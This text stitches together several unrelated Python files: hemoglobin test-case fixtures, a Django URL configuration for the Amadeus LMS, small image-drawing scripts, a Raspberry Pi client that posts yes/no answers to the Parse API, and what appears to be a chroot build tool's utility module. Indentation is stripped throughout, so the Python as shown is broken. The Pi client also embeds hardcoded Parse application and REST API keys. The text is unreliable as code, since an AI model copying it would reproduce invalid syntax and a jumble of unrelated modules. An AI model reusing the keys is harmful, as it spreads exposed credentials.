'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_23 = {'result_value': 12.777, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_24 = {'result_value': 13.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_19 = {'result_value': 9.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_20 = {'result_value': 9.955, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_21 = {'result_value': 11.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_22 = {'result_value': 11.959, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_23 = {'result_value': 10.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_24 = {'result_value': 12.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_19 = {'result_value': 8.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_20 = {'result_value': 8.955, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_21 = {'result_value': 9.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_22 = {'result_value': 9.959, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_23 = {'result_value': 9.511, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_24 = {'result_value': 10.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_13 = {'result_value': 8.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_14 = {'result_value': 9.159, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_15 = {'result_value': 9.544, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_16 = {'result_value': 8.000, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
"Test Cases End-HEMOGLOBIN"
TRUE_G1_ASSERTIONS = [
G1_TEST_2, G1_TEST_3, G1_TEST_5, G1_TEST_9, G1_TEST_8, G1_TEST_11,
G1_TEST_26, G1_TEST_27, G1_TEST_29, G1_TEST_14, G1_TEST_15, G1_TEST_17,
G1_TEST_20, G1_TEST_21, G1_TEST_23]
FALSE_G1_ASSERTIONS = [
G1_TEST_1, G1_TEST_4, G1_TEST_6, G1_TEST_10, G1_TEST_12, G1_TEST_7,
G1_TEST_25, G1_TEST_28, G1_TEST_30, G1_TEST_13, G1_TEST_16, G1_TEST_18,
G1_TEST_19, G1_TEST_22, G1_TEST_24]
TRUE_G2_ASSERTIONS = [
G2_TEST_2, G2_TEST_3, G2_TEST_5, G2_TEST_8, G2_TEST_11, G2_TEST_9,
G2_TEST_26, G2_TEST_27, G2_TEST_29, G2_TEST_14, G2_TEST_15, G2_TEST_17,
G2_TEST_20, G2_TEST_21, G2_TEST_23]
FALSE_G2_ASSERTIONS = [
G2_TEST_1, G2_TEST_4, G2_TEST_6, G2_TEST_10, G2_TEST_12, G2_TEST_7,
G2_TEST_25, G2_TEST_28, G2_TEST_30, G2_TEST_13, G2_TEST_16, G2_TEST_18,
G2_TEST_19, G2_TEST_22, G2_TEST_24]
TRUE_G3_ASSERTIONS = [
G3_TEST_2, G3_TEST_3, G3_TEST_5, G3_TEST_11, G3_TEST_9, G3_TEST_26,
G3_TEST_27, G3_TEST_29, G3_TEST_15, G3_TEST_17, G3_TEST_21, G3_TEST_23,
    G3_TEST_8, G3_TEST_14, G3_TEST_20]
FALSE_G3_ASSERTIONS = [
G3_TEST_1, G3_TEST_4, G3_TEST_6, G3_TEST_7, G3_TEST_10, G3_TEST_12,
G3_TEST_25, G3_TEST_28, G3_TEST_30, G3_TEST_13, G3_TEST_16, G3_TEST_18,
G3_TEST_19, G3_TEST_22, G3_TEST_24]
TRUE_G4_ASSERTIONS = [
G4_TEST_1, G4_TEST_4, G4_TEST_9, G4_TEST_5, G4_TEST_8, G4_TEST_17, G4_TEST_20,
G4_TEST_12, G4_TEST_13, G4_TEST_16]
FALSE_G4_ASSERTIONS = [
G4_TEST_2, G4_TEST_3, G4_TEST_7, G4_TEST_6, G4_TEST_18, G4_TEST_19, G4_TEST_10,
G4_TEST_11, G4_TEST_14, G4_TEST_15]
|
"""
Copyright 2016, 2017 UFPE - Universidade Federal de Pernambuco
This file is part of the Amadeus Learning Management System program, or simply Amadeus LMS
Amadeus LMS is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation (FSF), version 2 of the License.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of FITNESS FOR A PARTICULAR PURPOSE or MERCHANTABILITY. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License, under the title "LICENSE", along with this program; if not, write to the Free Software Foundation (FSF) Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
"""
from django.conf.urls import url
from django.contrib.auth import views as auth_views
from . import views
urlpatterns = [
url(r'^create/(?P<slug>[\w_-]+)/$', views.CreateView.as_view(), name = 'create'),
url(r'^update/(?P<topic_slug>[\w_-]+)/(?P<slug>[\w_-]+)/$', views.UpdateView.as_view(), name = 'update'),
url(r'^delete/(?P<slug>[\w_-]+)/$', views.DeleteView.as_view(), name = 'delete'),
url(r'^window_view/(?P<slug>[\w_-]+)/$', views.NewWindowView.as_view(), name = 'window_view'),
url(r'^view/(?P<slug>[\w_-]+)/$', views.InsideView.as_view(), name = 'view'),
url(r'^chart/(?P<slug>[\w_-]+)/$', views.StatisticsView.as_view(), name = 'get_chart'),
url(r'^send-message/(?P<slug>[\w_-]+)/$', views.SendMessage.as_view(), name = 'send_message'),
]
|
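# Render a filled disc in ASCII: '#' inside the circle of radius n/2 centred
# in an n-by-n grid, '.' outside.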
f = open("krog.txt", 'w')
n = 50
center = n/2
for i in range(n):
for j in range(n):
if (i - center)**2 + (j - center)**2 <= center**2:
f.write('#')
else:
f.write('.')
f.write('\n')
f.close()
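# Write a 255x255 plain-text PPM (P3) image: red grows down the rows,
# green across the columns, blue stays zero.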
f = open("slika.ppm", 'w')
f.write("P3\n")
f.write("# asdf\n")
n = 255
f.write("{} {}\n".format(n, n))
f.write("255\n")
for i in range(n):
for j in range(n):
r = i
g = j
b = 0
f.write('{} {} {} '.format(r, g, b))
f.write('\n')
f.close()
|
import RPi.GPIO as GPIO
from Adafruit_CharLCD import Adafruit_CharLCD
from subprocess import *
from time import sleep, strftime
from datetime import datetime
import urllib
import urllib2
import json
boxId = 1
boxLatitude = 53.3430708
boxLongitude = -6.2747221
questionId = ""
question = ""
loop = False
lcd = Adafruit_CharLCD()
lcd.begin(16, 1)
redButton = 4
greenButton = 18
GPIO.setmode(GPIO.BCM)
GPIO.setup(redButton, GPIO.IN)
GPIO.setup(greenButton, GPIO.IN)
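# Control flow: requestQuestion() pulls the current question for this box from
# the Parse REST API, then mainLoop() polls the buttons; sendResponse() posts
# the answer and re-enters mainLoop(). The mutual recursion keeps the program
# alive, at the cost of a slowly growing call stack on long sessions.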
def requestQuestion():
global questionId, question
print("Requesting current question...")
params = urllib.urlencode({"where":json.dumps({"targetBox": str(boxId)}),"order":"startDate","limit":"1"})
req = urllib2.Request('https://api.parse.com/1/classes/Questions?%s' % params,
headers = { "X-Parse-Application-Id" : "UzuNpxqIsLJIH8c2IFdKo0ifGEkD95pu5AV5bBmf",
"X-Parse-REST-API-Key" : "OSxv3JZH59IyoXE2Fof5RnJGiKhIXMv3lAcdUwoG",
"Content-Type" : "application/json"
})
response = urllib2.urlopen(req)
responseData = json.load(response)
questionId = responseData["results"][0]["objectId"]
question = responseData["results"][0]["question"]
print("Question received! current question is: " + question + " with ID: " + questionId)
mainLoop()
def sendResponse(response):
responseStr = "true"
responseLabel = "YES"
if response == False:
responseStr = "false"
responseLabel = "NO"
print("New response: " + responseLabel)
req = urllib2.Request("https://api.parse.com/1/classes/Responses",
headers = { "X-Parse-Application-Id" : "UzuNpxqIsLJIH8c2IFdKo0ifGEkD95pu5AV5bBmf",
"X-Parse-REST-API-Key" : "OSxv3JZH59IyoXE2Fof5RnJGiKhIXMv3lAcdUwoG",
"Content-Type" : "application/json"
},
data = '{"question":{"__type": "Pointer", "className": "Questions", "objectId": "' + questionId + '"}, "response":' + responseStr + ', "deviceType":"box", "deviceId":"' + str(boxId) + '", "location": {"__type": "GeoPoint", "latitude":'+ str(boxLatitude) +',"longitude": '+ str(boxLongitude) +'}}')
f = urllib2.urlopen(req)
print("Response sent!")
lcd.clear()
lcd.message("Response sent:\n" + responseLabel)
sleep(1.5)
mainLoop()
def mainLoop():
global loop
loop = True
lcd.clear()
if len(question) > 16:
lcd.message(question[:16] + "\n" + question[16:])
    else:
lcd.message(question)
try:
while loop:
if GPIO.input(redButton):
#print "RED button is 1/GPIO.HIGH/True"
loop = False
sendResponse(False)
if GPIO.input(greenButton):
#print "GREEN button is 1/GPIO.HIGH/True"
loop = False
sendResponse(True)
sleep(1)
except KeyboardInterrupt:
print "\n Program stopped by user\n"
#except:
#print "\n Unknown exception occurred\n"
finally:
GPIO.cleanup()
requestQuestion()
|
from __future__ import print_function
from ast import literal_eval
import ctypes
import errno
import fcntl
from glob import glob
import grp
import locale
import logging
import os
import os.path
import pickle
import pwd
import re
import select
import signal
import socket
import stat
import struct
import subprocess
import sys
import termios
from textwrap import dedent
import time
import uuid
import distro
from . import exception
from .trace_decorator import getLog, traceLog
from .uid import getresuid, setresuid
encoding = locale.getpreferredencoding()
try:
# pylint: disable=used-before-assignment
basestring = basestring
except NameError:
basestring = str
_libc = ctypes.cdll.LoadLibrary(None)
_libc.personality.argtypes = [ctypes.c_ulong]
_libc.personality.restype = ctypes.c_int
_libc.unshare.argtypes = [ctypes.c_int]
_libc.unshare.restype = ctypes.c_int
_libc.sethostname.argtypes = [ctypes.c_char_p, ctypes.c_int]
_libc.sethostname.restype = ctypes.c_int
CLONE_NEWNS = 0x00020000
CLONE_NEWUTS = 0x04000000
CLONE_NEWPID = 0x20000000
CLONE_NEWNET = 0x40000000
CLONE_NEWIPC = 0x08000000
PER_LINUX32 = 0x0008
PER_LINUX = 0x0000
personality_defs = {
'x86_64': PER_LINUX, 'ppc64': PER_LINUX, 'sparc64': PER_LINUX,
'i386': PER_LINUX32, 'i586': PER_LINUX32, 'i686': PER_LINUX32,
'ppc': PER_LINUX32, 'sparc': PER_LINUX32, 'sparcv9': PER_LINUX32,
'ia64': PER_LINUX, 'alpha': PER_LINUX,
's390': PER_LINUX32, 's390x': PER_LINUX,
'mips': PER_LINUX32, 'mipsel': PER_LINUX32,
'mipsr6': PER_LINUX32, 'mipsr6el': PER_LINUX32,
'mips64': PER_LINUX, 'mips64el': PER_LINUX,
'mips64r6': PER_LINUX, 'mips64r6el': PER_LINUX,
}
PLUGIN_LIST = ['tmpfs', 'root_cache', 'yum_cache', 'bind_mount',
'ccache', 'selinux', 'package_state', 'chroot_scan',
'lvm_root', 'compress_logs', 'sign', 'pm_request',
'hw_info']
USE_NSPAWN = False
class commandTimeoutExpired(exception.Error):
def __init__(self, msg):
exception.Error.__init__(self, msg)
self.msg = msg
self.resultcode = 10
@traceLog()
def get_proxy_environment(config):
env = {}
for proto in ('http', 'https', 'ftp', 'no'):
key = '%s_proxy' % proto
value = config.get(key)
if value:
env[key] = value
return env
@traceLog()
def mkdirIfAbsent(*args):
for dirName in args:
getLog().debug("ensuring that dir exists: %s", dirName)
if not os.path.exists(dirName):
try:
getLog().debug("creating dir: %s", dirName)
os.makedirs(dirName)
except OSError as e:
if e.errno != errno.EEXIST:
getLog().exception("Could not create dir %s. Error: %s", dirName, e)
raise exception.Error("Could not create dir %s. Error: %s" % (dirName, e))
@traceLog()
def touch(fileName):
getLog().debug("touching file: %s", fileName)
open(fileName, 'a').close()
@traceLog()
def rmtree(path, selinux=False, exclude=()):
"""Version of shutil.rmtree that ignores no-such-file-or-directory errors,
tries harder if it finds immutable files and supports excluding paths"""
if os.path.islink(path):
raise OSError("Cannot call rmtree on a symbolic link")
try_again = True
retries = 0
failed_to_handle = False
failed_filename = None
if path in exclude:
return
while try_again:
try_again = False
try:
names = os.listdir(path)
for name in names:
fullname = os.path.join(path, name)
if fullname not in exclude:
try:
mode = os.lstat(fullname).st_mode
except OSError:
mode = 0
if stat.S_ISDIR(mode):
try:
rmtree(fullname, selinux=selinux, exclude=exclude)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.EBUSY):
                                # we already tried handling this at a lower level and failed,
# there's no point in trying again now
failed_to_handle = True
raise
else:
os.remove(fullname)
os.rmdir(path)
except OSError as e:
if failed_to_handle:
raise
if e.errno == errno.ENOENT: # no such file or directory
pass
elif exclude and e.errno == errno.ENOTEMPTY: # there's something excluded left
pass
elif selinux and (e.errno == errno.EPERM or e.errno == errno.EACCES):
try_again = True
if failed_filename == e.filename:
raise
failed_filename = e.filename
os.system("chattr -R -i %s" % path)
elif e.errno == errno.EBUSY:
retries += 1
if retries > 1:
raise
try_again = True
getLog().debug("retrying failed tree remove after sleeping a bit")
time.sleep(2)
else:
raise
@traceLog()
def orphansKill(rootToKill, killsig=signal.SIGTERM):
"""kill off anything that is still chrooted."""
getLog().debug("kill orphans")
if USE_NSPAWN is False:
for fn in [d for d in os.listdir("/proc") if d.isdigit()]:
try:
root = os.readlink("/proc/%s/root" % fn)
if os.path.realpath(root) == os.path.realpath(rootToKill):
getLog().warning("Process ID %s still running in chroot. Killing...", fn)
pid = int(fn, 10)
os.kill(pid, killsig)
os.waitpid(pid, 0)
except OSError:
pass
else:
# RHEL7 does not know --no-legend, so we must filter the legend out
vm_list = subprocess.check_output(["/usr/bin/machinectl", "list", "--no-pager"])
if (isinstance(vm_list, bytes)):
vm_list = vm_list.decode("utf-8")
vm_list = '\n'.join(vm_list.split('\n')[1:-2])
for name in vm_list.split("\n"):
if len(name) > 0:
m_uuid = name.split()[0]
try:
vm_root = subprocess.check_output(["/usr/bin/machinectl", "show", "-pRootDirectory", m_uuid])
if (isinstance(vm_root, bytes)):
vm_root = vm_root.decode("utf-8")
except subprocess.CalledProcessError:
continue
vm_root = '='.join(vm_root.rstrip().split('=')[1:])
if vm_root == rootToKill:
getLog().warning("Machine %s still running. Killing...", m_uuid)
os.system("/usr/bin/machinectl terminate %s" % m_uuid)
@traceLog()
def yieldSrpmHeaders(srpms, plainRpmOk=0):
import rpm
ts = rpm.TransactionSet('/')
flags = (rpm._RPMVSF_NOSIGNATURES | rpm._RPMVSF_NODIGESTS)
ts.setVSFlags(flags)
for srpm in srpms:
try:
fd = os.open(srpm, os.O_RDONLY)
except OSError as e:
raise exception.Error("Cannot find/open srpm: %s. Error: %s"
% (srpm, e))
try:
hdr = ts.hdrFromFdno(fd)
except rpm.error as e:
raise exception.Error(
"Cannot find/open srpm: %s. Error: %s" % (srpm, e))
finally:
os.close(fd)
if not plainRpmOk and hdr[rpm.RPMTAG_SOURCEPACKAGE] != 1:
raise exception.Error("File is not an srpm: %s." % srpm)
yield hdr
@traceLog()
def checkSrpmHeaders(srpms, plainRpmOk=0):
for dummy in yieldSrpmHeaders(srpms, plainRpmOk):
pass
@traceLog()
def getNEVRA(hdr):
import rpm
name = hdr[rpm.RPMTAG_NAME]
ver = hdr[rpm.RPMTAG_VERSION]
rel = hdr[rpm.RPMTAG_RELEASE]
epoch = hdr[rpm.RPMTAG_EPOCH]
arch = hdr[rpm.RPMTAG_ARCH]
if epoch is None:
epoch = 0
ret = (name, epoch, ver, rel, arch)
return tuple(x.decode() if i != 1 else x for i, x in enumerate(ret))
@traceLog()
def cmpKernelVer(str1, str2):
'compare two kernel version strings and return -1, 0, 1 for less, equal, greater'
import rpm
return rpm.labelCompare(('', str1, ''), ('', str2, ''))
@traceLog()
def getAddtlReqs(hdr, conf):
# Add the 'more_buildreqs' for this SRPM (if defined in config file)
# pylint: disable=unused-variable
(name, epoch, ver, rel, arch) = getNEVRA(hdr)
reqlist = []
for this_srpm in ['-'.join([name, ver, rel]),
'-'.join([name, ver]),
'-'.join([name])]:
if this_srpm in conf:
more_reqs = conf[this_srpm]
if isinstance(more_reqs, basestring):
reqlist.append(more_reqs)
else:
reqlist.extend(more_reqs)
break
return set(reqlist)
@traceLog()
def unshare(flags):
getLog().debug("Unsharing. Flags: %s", flags)
try:
res = _libc.unshare(flags)
if res:
raise exception.UnshareFailed(os.strerror(ctypes.get_errno()))
except AttributeError:
pass
def sethostname(hostname):
getLog().info("Setting hostname: %s", hostname)
hostname = hostname.encode('utf-8')
if _libc.sethostname(hostname, len(hostname)) != 0:
raise OSError('Failed to sethostname %s' % hostname)
def condChroot(chrootPath):
if chrootPath is not None:
saved = {"ruid": os.getuid(), "euid": os.geteuid()}
setresuid(0, 0, 0)
os.chdir(chrootPath)
os.chroot(chrootPath)
setresuid(saved['ruid'], saved['euid'])
def condChdir(cwd):
if cwd is not None:
os.chdir(cwd)
def condDropPrivs(uid, gid):
if gid is not None:
os.setregid(gid, gid)
if uid is not None:
os.setreuid(uid, uid)
def condPersonality(per=None):
if per is None or per in ('noarch',):
return
if personality_defs.get(per, None) is None:
return
res = _libc.personality(personality_defs[per])
if res == -1:
raise OSError(ctypes.get_errno(), os.strerror(ctypes.get_errno()))
def condEnvironment(env=None):
if not env:
return
os.environ.clear()
for k in list(env.keys()):
os.putenv(k, env[k])
def condUnshareIPC(unshare_ipc=True):
if unshare_ipc:
try:
unshare(CLONE_NEWIPC)
except exception.UnshareFailed:
# IPC and UTS ns are supported since the same kernel version. If this
# fails, there had to be a warning already
pass
def process_input(line):
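    # replay terminal control characters captured from a pty: '\r' restarts
    # the line and '\b' removes the previous character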
out = []
for char in line.rstrip('\r'):
if char == '\r':
out = []
elif char == '\b':
out.pop()
else:
out.append(char)
return ''.join(out)
def logOutput(fds, logger, returnOutput=1, start=0, timeout=0, printOutput=False,
child=None, chrootPath=None, pty=False):
output = ""
done = False
# set all fds to nonblocking
for fd in fds:
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
if not fd.closed:
fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
mockbuild_logger = logging.getLogger('mockbuild')
stored_propagate = mockbuild_logger.propagate
if printOutput:
# prevent output being printed twice when log propagates to stdout
mockbuild_logger.propagate = 0
sys.stdout.flush()
try:
tail = ""
ansi_escape = re.compile(r'\x1b\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]\x0f?')
while not done:
if (time.time() - start) > timeout and timeout != 0:
done = True
break
i_rdy, o_rdy, e_rdy = select.select(fds, [], [], 1)
if not i_rdy and not o_rdy and not e_rdy:
if child and child.poll() is not None:
logger.info("Child pid '%s' is dead", child.pid)
done = True
if chrootPath:
logger.info("Child dead, killing orphans")
orphansKill(chrootPath)
continue
for s in i_rdy:
# slurp as much input as is ready
raw = s.read()
if not raw:
done = True
break
if printOutput:
if hasattr(sys.stdout, 'buffer'):
# python3 would print binary strings ugly
# pylint: disable=no-member
sys.stdout.buffer.write(raw)
else:
print(raw, end='')
sys.stdout.flush()
txt_input = raw.decode(encoding, 'replace')
lines = txt_input.split("\n")
if tail:
lines[0] = tail + lines[0]
# we may not have all of the last line
tail = lines.pop()
if not lines:
continue
if pty:
lines = [process_input(line) for line in lines]
processed_input = '\n'.join(lines) + '\n'
if logger is not None:
for line in lines:
if line != '':
line = ansi_escape.sub('', line)
logger.debug(line)
for h in logger.handlers:
h.flush()
if returnOutput:
output += processed_input
if tail:
if pty:
tail = process_input(tail) + '\n'
if logger is not None:
logger.debug(tail)
if returnOutput:
output += tail
finally:
mockbuild_logger.propagate = stored_propagate
return output
@traceLog()
def selinuxEnabled():
"""Check if SELinux is enabled (enforcing or permissive)."""
with open("/proc/mounts") as f:
for mount in f.readlines():
            # the first field of a /proc/mounts line is the source device,
            # which for the selinuxfs pseudo-filesystem is literally "selinuxfs"
            (device, mountpoint, _) = mount.split(None, 2)
            if device == "selinuxfs":
selinux_mountpoint = mountpoint
break
else:
selinux_mountpoint = "/selinux"
try:
enforce_filename = os.path.join(selinux_mountpoint, "enforce")
with open(enforce_filename) as f:
if f.read().strip() in ("1", "0"):
return True
except:
pass
return False
def resize_pty(pty):
try:
winsize = struct.pack('HHHH', 0, 0, 0, 0)
winsize = fcntl.ioctl(sys.stdout.fileno(), termios.TIOCGWINSZ, winsize)
fcntl.ioctl(pty, termios.TIOCSWINSZ, winsize)
except IOError:
# Nice to have, but not necessary
pass
@traceLog()
def do(command, shell=False, chrootPath=None, cwd=None, timeout=0, raiseExc=True,
returnOutput=0, uid=None, gid=None, user=None, personality=None,
printOutput=False, env=None, pty=False, nspawn_args=[],
*args, **kargs):
logger = kargs.get("logger", getLog())
output = ""
start = time.time()
if pty:
master_pty, slave_pty = os.openpty()
resize_pty(slave_pty)
reader = os.fdopen(master_pty, 'rb')
preexec = ChildPreExec(personality, chrootPath, cwd, uid, gid, unshare_ipc=bool(chrootPath))
if env is None:
env = clean_env()
stdout = None
try:
child = None
if shell and isinstance(command, list):
command = ['/bin/sh', '-c'] + command
shell = False
if chrootPath and USE_NSPAWN:
command = _prepare_nspawn_command(chrootPath, user, command,
nspawn_args=nspawn_args, env=env, cwd=cwd)
logger.debug("Executing command: %s with env %s and shell %s", command, env, shell)
with open(os.devnull, "r") as stdin:
child = subprocess.Popen(
command,
shell=shell,
env=env,
bufsize=0, close_fds=True,
stdin=stdin,
stdout=slave_pty if pty else subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=preexec,
)
if not pty:
stdout = child.stdout
with child.stderr:
# use select() to poll for output so we dont block
output = logOutput(
[reader if pty else child.stdout, child.stderr],
logger, returnOutput, start, timeout, pty=pty,
printOutput=printOutput, child=child,
chrootPath=chrootPath)
except:
# kill children if they arent done
if child is not None and child.returncode is None:
os.killpg(child.pid, 9)
try:
if child is not None:
os.waitpid(child.pid, 0)
except:
pass
raise
finally:
if pty:
os.close(slave_pty)
reader.close()
if stdout:
stdout.close()
# wait until child is done, kill it if it passes timeout
niceExit = 1
while child.poll() is None:
if (time.time() - start) > timeout and timeout != 0:
niceExit = 0
os.killpg(child.pid, 15)
if (time.time() - start) > (timeout + 1) and timeout != 0:
niceExit = 0
os.killpg(child.pid, 9)
# only logging from this point, convert command to string
if isinstance(command, list):
command = ' '.join(command)
if not niceExit:
raise commandTimeoutExpired("Timeout(%s) expired for command:\n # %s\n%s" % (timeout, command, output))
logger.debug("Child return code was: %s", child.returncode)
if raiseExc and child.returncode:
if returnOutput:
raise exception.Error("Command failed: \n # %s\n%s" % (command, output), child.returncode)
else:
raise exception.Error("Command failed. See logs for output.\n # %s" % (command,), child.returncode)
return output
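# Illustrative sketch only (paths and timeout are hypothetical): capture the
# output of a command run inside an existing chroot.
#   out = do(['/bin/rpm', '-qa'], chrootPath='/var/lib/mock/f25-x86_64/root',
#            returnOutput=1, timeout=60)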
class ChildPreExec(object):
def __init__(self, personality, chrootPath, cwd, uid, gid, env=None,
shell=False, unshare_ipc=False):
self.personality = personality
self.chrootPath = chrootPath
self.cwd = cwd
self.uid = uid
self.gid = gid
self.env = env
self.shell = shell
self.unshare_ipc = unshare_ipc
getLog().debug("child environment: %s", env)
def __call__(self, *args, **kargs):
if not self.shell:
os.setsid()
os.umask(0o02)
condPersonality(self.personality)
condEnvironment(self.env)
if not USE_NSPAWN:
condChroot(self.chrootPath)
condDropPrivs(self.uid, self.gid)
condChdir(self.cwd)
condUnshareIPC(self.unshare_ipc)
reset_sigpipe()
def reset_sigpipe():
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def is_in_dir(path, directory):
"""Tests whether `path` is inside `directory`."""
# use realpath to expand symlinks
path = os.path.realpath(path)
directory = os.path.realpath(directory)
return os.path.commonprefix([path, directory]) == directory
def _prepare_nspawn_command(chrootPath, user, cmd, nspawn_args=[], env=None, cwd=None):
cmd_is_list = isinstance(cmd, list)
if user:
# user can be either id or name
if cmd_is_list:
cmd = ['-u', str(user)] + cmd
else:
raise exception.Error('Internal Error: command must be list or shell=True.')
elif not cmd_is_list:
cmd = [cmd]
nspawn_argv = ['/usr/bin/systemd-nspawn', '-q', '-M', uuid.uuid4().hex, '-D', chrootPath]
distro_label = distro.linux_distribution(full_distribution_name=False)[0]
if (distro_label != 'centos') and (distro_label != 'rhel'):
# EL7 does not support it (yet). See BZ 1417387
nspawn_argv += ['-a']
nspawn_argv.extend(nspawn_args)
if cwd:
nspawn_argv.append('--chdir={0}'.format(cwd))
if env:
# BZ 1312384 workaround
env['PROMPT_COMMAND'] = r'printf "\033]0;<mock-chroot>\007"'
env['PS1'] = r'<mock-chroot> \s-\v\$ '
for k, v in env.items():
nspawn_argv.append('--setenv={0}={1}'.format(k, v))
cmd = nspawn_argv + cmd
if cmd_is_list:
return cmd
else:
return " ".join(cmd)
def doshell(chrootPath=None, environ=None, uid=None, gid=None, cmd=None,
nspawn_args=[],
unshare_ipc=True):
log = getLog()
log.debug("doshell: chrootPath:%s, uid:%d, gid:%d", chrootPath, uid, gid)
if environ is None:
environ = clean_env()
if 'PROMPT_COMMAND' not in environ:
environ['PROMPT_COMMAND'] = r'printf "\033]0;<mock-chroot>\007"'
if 'PS1' not in environ:
environ['PS1'] = r'<mock-chroot> \s-\v\$ '
if 'SHELL' not in environ:
environ['SHELL'] = '/bin/sh'
log.debug("doshell environment: %s", environ)
if cmd:
if not isinstance(cmd, list):
cmd = [cmd]
cmd = ['/bin/sh', '-c'] + cmd
else:
cmd = ["/bin/sh", "-i", "-l"]
if USE_NSPAWN:
# nspawn cannot set gid
cmd = _prepare_nspawn_command(chrootPath, uid, cmd, nspawn_args=nspawn_args, env=environ)
preexec = ChildPreExec(personality=None, chrootPath=chrootPath, cwd=None,
uid=uid, gid=gid, env=environ, shell=True,
unshare_ipc=unshare_ipc)
log.debug("doshell: command: %s", cmd)
return subprocess.call(cmd, preexec_fn=preexec, env=environ, shell=False)
def run(cmd, isShell=True):
log = getLog()
log.debug("run: cmd = %s\n", cmd)
return subprocess.call(cmd, shell=isShell)
def clean_env():
env = {
'TERM': 'vt100',
'SHELL': '/bin/sh',
'HOME': '/builddir',
'HOSTNAME': 'mock',
'PATH': '/usr/bin:/bin:/usr/sbin:/sbin',
}
env['LANG'] = os.environ.setdefault('LANG', 'en_US.UTF-8')
return env
def get_fs_type(path):
cmd = ['/usr/bin/stat', '-f', '-L', '-c', '%T', path]
p = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE,
universal_newlines=True)
p.wait()
with p.stdout as f:
return f.readline().strip()
def find_non_nfs_dir():
dirs = ('/dev/shm', '/run', '/tmp', '/usr/tmp', '/')
for d in dirs:
if not get_fs_type(d).startswith('nfs'):
return d
raise exception.Error('Cannot find non-NFS directory in: %s' % dirs)
@traceLog()
def setup_default_config_opts(unprivUid, version, pkgpythondir):
"sets up default configuration."
config_opts = {}
config_opts['version'] = version
config_opts['basedir'] = '/var/lib/mock' # root name is automatically added to this
config_opts['resultdir'] = '%(basedir)s/%(root)s/result'
config_opts['cache_topdir'] = '/var/cache/mock'
config_opts['clean'] = True
config_opts['check'] = True
config_opts['post_install'] = False
config_opts['chroothome'] = '/builddir'
config_opts['log_config_file'] = 'logging.ini'
config_opts['rpmbuild_timeout'] = 0
config_opts['chrootuid'] = unprivUid
try:
config_opts['chrootgid'] = grp.getgrnam("mock")[2]
except KeyError:
# 'mock' group doesn't exist, must set in config file
pass
config_opts['build_log_fmt_name'] = "unadorned"
config_opts['root_log_fmt_name'] = "detailed"
